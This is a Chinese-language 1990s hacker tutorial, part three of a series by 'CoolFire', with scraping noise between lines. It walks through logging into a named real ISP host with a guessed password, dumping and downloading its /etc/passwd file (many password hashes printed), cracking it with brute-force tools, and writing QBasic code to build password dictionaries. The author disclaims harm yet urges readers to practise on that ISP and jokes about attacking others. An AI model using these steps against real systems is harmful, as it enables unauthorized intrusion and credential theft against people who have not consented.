如何破解系統(tǒng)（3）

這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!
: o3 p8 b  m( p& }8 ]) g4 F- h7 a3 x- @
1 E8 A7 e! O: ^7 C前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號(hào)被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩周的探險(xiǎn)中, 為了找一個(gè)酷似網(wǎng)路咖啡站臺(tái)的
W3 密碼,誤入一個(gè)號(hào)稱第一個(gè)提供網(wǎng)路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
之後, 使用了自己寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這里提醒大家, 還好我沒有找到 root password, 不然可能該系統(tǒng)就此停擺,不可再見天日也! (當(dāng)然我不可能這麼作啦!).
# }9 w7 R/ g& j
% W$ A9 C( C; G( q看看最近興起的網(wǎng)路咖啡及各大網(wǎng)站的系統(tǒng)安全設(shè)施, 再加上 CoolFire最近開會(huì)的時(shí)候遇到的情況, 不難發(fā)現(xiàn)我們的國家正往高科技的領(lǐng)域快步邁進(jìn), 但是這些系統(tǒng)的安全性若不加強(qiáng),可能到時(shí)候人家只要一臺(tái)電腦再加上一臺(tái)數(shù)據(jù)機(jī)就可以讓整個(gè)國家的金融及工商業(yè)崩潰!
大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術(shù)上理應(yīng)比較強(qiáng), 但還是輕易讓人入侵, 且又沒有教導(dǎo)User 正確的網(wǎng)路使用觀念 (Password 的設(shè)定及 proxy 的使用等),實(shí)在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會(huì)是甚麼樣子 ??

這一次的說明還是沒有談到新的技巧, 在 James將首頁更新後各位應(yīng)該已經(jīng)可以從中學(xué)到許多東西了, 如果想要學(xué)習(xí)入侵, 就一定要知道最新的資訊 (入侵本國的網(wǎng)路則不用,反正沒人重視網(wǎng)路安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!

本次主題: 說明如何連接該 ISP 并且對(duì)其 /etc/passwd 解碼連接位址: www.coffee.com.tw (203.66.169.11)特別說明: 由於本次主題說明重點(diǎn)使用真實(shí)的位址及名稱, 所以 CoolFire 已經(jīng) Mail給該網(wǎng)頁之維護(hù)人員更改密碼, 但該網(wǎng)頁之 ISP 仍為新手之練習(xí)好題材! CoolFire
Mail 給該網(wǎng)頁維護(hù)人員之信件內(nèi)容如下, 如果他還不盡快改掉, 我也沒辦法了!
  E) n$ P& b! {/ z2 b2 K3 T
8 p- j& M3 u+ G7 d" t5 ZMail sent to dhacme@tp.globalnet.com.tw:
Subject: 請(qǐng)速更動(dòng)網(wǎng)頁密碼
From: CoolFire <coolfires@hotmail.com>
( G/ F( L9 c: v
你的網(wǎng)頁作得不錯(cuò), 但是因?yàn)槟闼O(shè)定的密碼太容易為駭客所? 入侵, 請(qǐng)於見到此信後速速更改你的網(wǎng)頁進(jìn)入密碼, 否則下次若網(wǎng)頁遭到篡改, 本人概不負(fù)責(zé)!!
' S! p( e9 Y4 {6 G
+ F, ?! b2 l6 r9 h5 l( c3 N  t' m; ~**** 課程開始 ****

1 N5 |, ^7 O( Q' [# U; e# z' n請(qǐng)注意: 由於本次所作的課程內(nèi)容以實(shí)作為主, 除了本人 IP 有所更改,一切都使用本人所用之
& h1 X5 d( i$ j- R8 N) {. O1 T1 BTelnet 軟體 Log 檔收錄, 故若道德感不佳者請(qǐng)勿閱讀以下之詳細(xì)破解內(nèi)容,否則本人概不負(fù)責(zé)!

(連線到某一主機(jī)之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
# {0 q  U3 S- B* m4 h, Tms.hinet.net.tw> telnet www.coffee.com.tw
. {$ @3 k! d' @Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
1 @' _8 u7 o) e( D( C8 `( G  DPassword: (隨便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
. X* g) h/ d' |5 {Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw
8 F7 _+ R& ~, f6 R# p0 |1 [
歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
=================================================================

1 d% j( `4 g$ U(直接進(jìn)入核心部份)
) X6 n& m- _* cwww:~$ cd /etc
www:/etc$ ls
* r- b% Y, g9 X8 ~+ \% @8 i9 zDIR_COLORS hosts.equiv printcap
' c1 \$ U1 P. {# k* k) JHOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
# v3 t" j9 _+ X5 g0 S& w! ANNTP_INEWS_DOMAIN inetd.conf psdevtab
8 d! W8 z1 ^1 n# fX11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
7 K' {  x7 ~$ `0 v$ {fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
( S# T+ g. U7 _9 Gfstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
0 J% P; N# B9 [, n1 I0 @ftpaccess motd.bak sudoers
4 R+ ~( U. i  V9 v* ~/ P% X3 sftpconversions msgs/ syslog.conf
$ F$ |3 X7 ~' K; P* R5 q6 Zftpgroups mtab syslog.pid
1 ?6 a- m% G3 n" n; ?% @2 aftpusers mtools termcap
3 }7 L( s5 F7 m0 Wgateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
& A- v% `6 R: A# M2 j) K/ Xhost.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
* f$ L$ h3 L5 F. J% R* T% ahosts.allow passwd.old
hosts.deny ppp/
$ a, K# K/ b( ]! o) u
(看看我們的目標(biāo)長得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
7 R' ?0 @# A3 M5 abin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
7 O, l! o; l, Hlp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
  s; Y" f$ n& ?9 f! m9 b- Smail:*:8:12:mail:/var/spool/mail:
: o$ V8 s/ X% j% H9 {; R  Snews:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
( L0 G# h  y5 y+ k: coperator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
- B. p2 b& i! i/ G9 I, v: O  f- eman:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
* ?0 o$ j0 t8 M% gftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
0 i- p& f8 b; C% \1 }3 m- x8 Hshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
$ o# r$ s( u1 l. m/ ]+ j( y! ~test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
' I! F  b( {- U3 C" yfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
+ t2 r' E! }1 T9 bkanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
5 _! U+ b: p- R1 i+ i& [coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
7 x' _5 h! y0 V7 P; s( C4 |6 Fbakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
8 t. v  K- I. R5 g8 A. fprime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
# y" m  r4 J" h' I, z. J! _ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
' ^# }  g7 C9 N2 ?! |* ?+ Rsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
$ L) l, Q: W6 ~% M" E/ z3 Xorder:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
8 r) Q% w/ M7 v' N0 xcorey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
9 I6 P- Q7 r5 zhotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
2 S; k, u( y  i7 Q# R3 Estonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
, f! [9 H" [7 {$ J5 @lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
& Y, v) c2 A6 T1 h3 U. Ntaiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
& ^/ y2 b* x: u* T) O) T- jsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
$ A9 x) H' E# T% Mkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
% f; i- D8 q) S( w# [recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
& R4 H, A6 ?1 Q/ S6 ghxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
- F/ N- `7 v; |goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
& R/ k6 e# f! ^8 m8 m5 |+ L) ocharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
. w1 w& |" ?8 F  ?9 ^$ S* G( U7 ws6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
% D" A0 l. @2 P; C+ d$ w7 Z  ?lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
+ q1 n% Q" u  W. F% vjordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
: {$ f4 |8 q2 b- L- Syahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
8 I! O, B# q! Y; O6 G; ubasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
. }  {$ v' z0 W; [  R" b- Kkaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
, @! I' `# H7 K" h; ]. K$ Hshuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
/ C! T" j$ L! v! @fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

(CoolFire 注: 因?yàn)槭褂?PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個(gè)一個(gè)試?yán)瞺~~ 我沒說喔!)
9 l8 d6 ^) u, S
* F1 ^2 [% Q$ v9 W" s* x* Iwww:/etc$ exit
logout
Connection closed by foreign host.

: L* W6 J$ J) j/ k6 @* R6 \  P(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)
9 w% p" n$ {  ?1 r
) A7 g: X  K. j& T8 Jms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
/ y$ q3 v4 v) N- @5 z220-
  b6 s; \5 B. o2 Y; }; T3 y220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
220-
220-
) N6 ~. Z2 Q: u$ h220- There are 0 users in FTP Server now.
% p/ b. u/ F: C& m8 k220- 目前已有 0 使用者在此 Server 上.
* J2 f4 O) s& Q220- If you have any suggestion, please mail to:
2 p8 z! \/ v- ~' A" x9 T220- service@xx.xxxxxxx.xxx.xx.
! v( O0 n/ k" T5 u220-
5 I% O8 W. Y6 A, \. w220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(還是使用剛剛的帳號(hào)進(jìn)入)
3 P: K6 o9 @6 N7 V7 J
8 B: B6 x* D0 m" z# TName (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
6 _9 [. u( z3 F" U8 P' B- ]2 C6 W230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

# g* c, v" s* A5 z(直接到達(dá)檔案放置地點(diǎn))

ftp> cd /etc
( \- j9 X' N  \2 p9 K1 J. o250 CWD command successful.
. t' d& e* o1 y! N6 Uftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
9 h! a' O/ f& C, dttys
1 y3 W5 x3 S3 |% Jfdprm
8 m- K. N/ P6 ^* _# I; k% ugroup
" R. H3 N% l. f7 k: eissue
9 ^( r5 f6 |2 a& ~$ S( G; Bmotd
mtools
profile
securetty
/ q  k; x0 P' y5 x6 [& U, F* T+ |. Xshells
termcap
skel
csh.cshrc
3 `0 Y  j; j2 y1 \4 ecsh.login
" _! Z3 a3 c) blilo
inet
: M6 F/ u5 j; x* h( N. mdefault
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
1 m- a) \0 r# G4 q, X3 [# \wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
, d! v0 ~: B! Yat.deny
fs
* ^# b, p; E' h9 c9 x& Lmagic
! e: n1 X, p# Q. s4 Brc.d
* z3 a( k" Z7 W' W8 D, F& ysyslog.conf
printcap
inittab
sudoers
6 ?' `6 g, S2 Y$ Gvga
8 C5 S  @2 Y( k. I$ Bdiphosts
mail.rc
ppp
( b7 d$ n6 ^/ rNNTP_INEWS_DOMAIN
/ ]! H6 W0 c& P  Z3 m3 x* B6 I& Esendmail.st
NETWORKING
- z. P: a% b) o& k9 {gateways
8 _3 ]; C9 |- c; x* Obootptab
! ]! E' q. {9 X/ I1 _' E" Aexports
ftpusers
host.conf
2 _2 O4 H; }6 f; }- Ghosts
hosts.allow
) q, V9 g; q5 a8 Z: I. }4 phosts.deny
* ?; x5 r4 ?  x% I0 I( P1 Vhosts.equiv
/ r( B( \1 V4 e* sinetd.conf
9 d: r8 Y& d6 H$ r/ Mnamed.boot
networks
nntpserver
protocols
) O1 }1 }& p$ W# m5 @: |. Jresolv.conf
rpc
/ n, J6 Z" G$ uftpaccess
0 U8 J: [* k& R# i* t7 y2 T1 vhosts.lpd
  p1 A/ a+ F5 [( a$ s4 Dftpconversions
snooptab
msgs
7 n: Q/ O: R6 H; ^ftpgroups
slip.login
/ p# \' y& u. Y2 O( Zslip.hosts
yp.conf.example
X11
3 g! O" o( u/ T3 R" e' d1 h* flilo.conf
sendmail.cf
fstab
; R. n! P0 |8 m' Y) u) r2 o7 Z/ zfastboot
mtab
syslog.pid
9 B' U9 V/ m6 y* c& Jklogd.pid
shutdownpid
localtime
# n! o5 y' H: s, T, W+ `% e: Lpasswd.old
: \/ E% ?) ~8 a: Z5 H* qioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.

; P# r5 ^0 r+ Q3 e(取回該檔案)
0 V7 }: p1 q2 b( V3 }3 |, Z* J- b
& h# \1 u7 g' a+ @  l" e8 K) ]ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
6 d8 J$ d7 k; x2 ^+ V0 i, }226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

. H  Z& P" }4 z(盡速離開)

4 ]: ^9 A$ o4 N; l9 n, g) Sftp> bye
221 Goodbye.

& _+ n$ ?! P$ X- M- _好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧
+ i" ?( o- M9 O0 f7 q!!快點(diǎn)跑一下, 讓它自動(dòng)產(chǎn)生字典檔案:
4 X8 @( \2 p% }, R# q/ n
C:\hack>pass2dic
- ~5 {5 V0 A1 a: u* C8 EPaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:
- L+ n; l" E3 ?+ j6 T, L5 d  l
[1] Load PASSWD file and convert it to only username text file
* N; M, l5 j$ I6 s4 _) D# p[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
! y( i9 @+ n2 O/ N2 {3 SYour Target Dictionary Name: dic.cfe

3 ^2 j& `" L) pPaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
6 N. F2 N5 u1 W: p( Y/ UFETAG Software Development Co: http://www.showtower.com.tw/~fetag

" |( O3 S6 F1 C% e/ R4 H) y7 DC:\hack>

( O2 F+ O2 L4 j* _. Z6 X- r(這樣就好了 ! 自動(dòng)產(chǎn)生的檔案會(huì)放在 dic.cfe 這個(gè)檔案中, 咱們跑一下 Brute Force看看!)
0 y+ u3 ^# M, s
4 F7 w/ }# Q5 T- a5 W
) K" V* J* z+ K/ ^8 E0 G# JC:\hack>fbrute passwd @dic.cfe
/ {7 H* o/ c( _$ v( j/ |+ r
BRUTE!, Unix Brute Force Hacking Routine. v2.0
" @- }0 y5 J- B/ _  U# o- J% @Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
' y2 G7 E, J; ~& U+ s0 U闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
Attempts/Hits: 5184/9
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

! _3 G% ~  m% M3 rTaking list input from dic.cfe
Beginning search of passwd for password: xxx
9 ?8 b5 A+ P7 d+ ~
! {# T* o  R% \4 n' A; A. NMatch for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
7 v" q5 A, U" E% j) XMatch for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
) l5 k3 ^6 {* g: l/ R2 a5 I0 s6 \1 NMatch for password coffee found! Username: coffee
# ~4 I% c" G/ ?  E. uMatch for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
! q% {# B, M( B( S% WMatch for password xxxx found! Username: xxxx

Done.
4 C1 O8 L% ^; M, N  `* O8 s
C:\hack>
5 _  @: v$ r' O
6 r: k' ?/ r% b' L. C看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實(shí)在是....@#$%^...&*因某些關(guān)系所以其它部份要被 "馬賽克" 起來, 請(qǐng)各位讀者見量!
% z+ j% R; R8 _8 x+ h4 T
6 t# M9 C2 F0 P4 ^& p/ _**** 再談密碼 ****
7 @. _9 ]& `  C6 h  `& ^* m
' ^- t; H" n; K# {2 b- H5 h看了以上的破解示范, 就可以了解到許多人還是對(duì)於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設(shè)定一個(gè)好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
- c; y# ^, M- i0 C! AQBasic 來設(shè)計(jì)一個(gè)自動(dòng)產(chǎn)生密碼的小程式, 相信對(duì)許多人有很大的幫助,底下我們?cè)賮頊\顯的介紹一下字母密碼的產(chǎn)生方法, 相信對(duì)於你在 Hack 某站會(huì)有更大的幫助.
& u( `- L& X" u' d9 u, ?, B/ V
0 i9 _* d* P& Q: d& Y' j事情的開始是有一位網(wǎng)友 mail 給我, 問我字典檔要如何寫程式來 "自動(dòng)擴(kuò)大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對(duì)這位網(wǎng)友的問題作一個(gè)更詳細(xì)的說明 (因已簡(jiǎn)短回信答覆),并且寫出來讓大家了解一下, 當(dāng)然我們的示范還是使用 QBasic, 因?yàn)檫@是最容易找到的程式了,而且語法大家也可能會(huì)比較熟悉一點(diǎn), 如果我使用 VB 或 C 來寫, 可能有些人只會(huì)拿去用,而不會(huì)去修改或者寫個(gè)好一點(diǎn)的出來!
- P# F5 s- @. B
先說明一下原理好了: 我們所要作的程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個(gè)簡(jiǎn)單的單字出來比較看看:
" V* y6 u2 a& D+ v8 E
7 ?) F0 F5 Y2 `) Y: E( x[1] apple [2] guest [3] james [4] superman [5] password

0 W6 s% u( U$ v0 @OK! 來看看! 如果你有一點(diǎn)英文的概念的話應(yīng)該會(huì)知道母音及子音吧 !
我們首先這樣說明: 母音在英文
上有 : A E I O U 這五個(gè), 所有的英文單字都會(huì)有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
6 ^2 D1 ?: s! [# n  D再來就是比較每個(gè)字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個(gè)子音再接一個(gè)母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請(qǐng)自行統(tǒng)計(jì)), 然後是結(jié)尾部份, 通常結(jié)尾部分有下列幾種: e;est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !!
我大略寫一個(gè)簡(jiǎn)單的, 其它大家自行發(fā)揮, 如果有人學(xué)語言學(xué)的, 請(qǐng)幫忙弄一份常用組合表出來, 可能會(huì)更有幫助吧 !!

+ c2 g- k0 [& \底下就是該程式片段, 執(zhí)行後會(huì)產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個(gè)字的字典!!
: ]* n1 t3 B3 Q! q( ^
--------------- MakeDic.BAS Start Here
2 ?7 h- R0 A2 g! j# e6 n! I  F% j9 A-------------------------------------------------------------------------------
--------
) K# u8 a4 n9 X' P6 A3 q6 MDIM FirstWord$(20)
DIM MotherWord$(13)
& B  \* Y- L3 w' t. X1 B4 WDIM LastWord$(12)
7 s: [* q. ]6 Z* j7 V
7 P, L2 W* A; k8 p' HDATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
"t", "p", "k" , "f", "m", "n", "b","k"
; v- ~3 K+ x" [* M) s  Y1 TDATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
3 D4 S" |2 F+ p! q" ?2 I2 y- vDATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
5 Z- E+ M8 H" F8 w* `" ?4 dNEXT I
# L' D+ t! M( _$ J
FOR I = 1 TO 13
) R2 }/ v/ |9 p; h+ ^# D) JREAD MotherWord$(I)
" ]7 j5 h& U/ G4 Y! O# jNEXT I
) I3 O: H- h, v, ~
+ c' `8 I0 q" |+ X  m. WFOR I = 1 TO 12
& U- J/ S5 F% C0 @4 j) w, h6 AREAD LastWord$(I)
" w& B: h$ ~* \6 rNEXT I
8 z4 j$ F3 V7 B% L: q& A# P
; i4 f) i% O3 B/ Y- P1 oOPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20
9 X* ?# D2 ?$ `( o$ U9 LFOR J = 1 TO 13
' q* w, Q% d" P: gFOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
NEXT J
NEXT I
$ K" P/ y. W& q# y
/ S: t, {1 R0 f, M% ?) u6 ICLOSE : END
--------------- Cut Here, End of MakeDic.BAS
& y. V* k1 e/ n5 c2 a( e-------------------------------------------------------------------------------
4 O/ K6 C# `# `9 ~( Z8 W: J-
) q) a6 n* f4 d. G; R
當(dāng)然這只是小部份的組合, 相信你可以作出一個(gè)更大的字典檔出來, 如:
2 ]4 t% h, k' m: U0 |7 |% g子音+母音+子音+母音+子音, 作出來的字典檔會(huì)很嚇人喔 !! 這一個(gè)部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式,寫好了請(qǐng) Mail 一份給我喔 !! 如果可以的話請(qǐng)說明是否可以公布在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!

希望每次講到密碼的問題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對(duì)照看看,如果有相同的請(qǐng)趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業(yè)者...... ISP
3 _, g, x7 j0 Y# [! k+ T們.... 教教你們的使用者吧..... 唉~~~~


**** 後語 ****
5 k( z' a1 n8 U( Q) k
我們的首頁感謝大家的支持, 現(xiàn)在人數(shù)已經(jīng)到達(dá) 2,000 了, 這是一個(gè)地下站(未對(duì)外正式公布) 很棒的一個(gè)數(shù)字, 在與其它工作室人員研究之後, 暫時(shí)不對(duì)外公布站址, 如果你是 "誤闖"到本站來的! 我們歡迎你的加入, 但目前尚不考慮對(duì)外公布站址, 請(qǐng)您在告訴你的朋友有這麼一個(gè)站存在的時(shí)候,請(qǐng)他不要隨便告訴別人 (請(qǐng)只告訴你信賴的朋友; 或?qū)﹄娔X有一份特別狂熱的人, 我們都?xì)g迎他們的加入),我們目前所采用的方式將是開放式的! 對(duì)首頁部份暫時(shí)不以密碼方式處理.
% }3 c7 P) |8 C4 A# r* ?1 Z' g/ {: I
. `: D: U) |5 O8 D** 不要 Crack 這個(gè)首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會(huì)完全關(guān)閉, 再也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識(shí)", 不要利用它來奪取任何的 "權(quán)利",本首頁著重的是教育, 而不是一　的教導(dǎo)攻擊的方法, 希望大家對(duì)於政府機(jī)關(guān) (org.tw) 或教育機(jī)構(gòu) (edu.tw)不要作任何的破壞!!還有我的 ISP......:D
" a: }% [0 I& d8 E
0 R8 L; }  y# @/ L! Q, |------
哇! 一份案子搞了好久, 都沒時(shí)間維護(hù)網(wǎng)頁了, 所以特別將維護(hù)的工作還給了 James,希望大家多多支持我們的園地, 我案子搞完後再跟大家談?wù)勎易罱膶?shí)戰(zhàn)故事! 雖然沒時(shí)間寫網(wǎng)頁,但是還是會(huì)寫一些文件給大家作為參考 !!
* N, `! i$ C0 B! t, s1 ~
------
9 ^+ q9 m% Z' C! h8 P再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!

3 Q% j5 b" M4 Z0 r3 S5 [2 H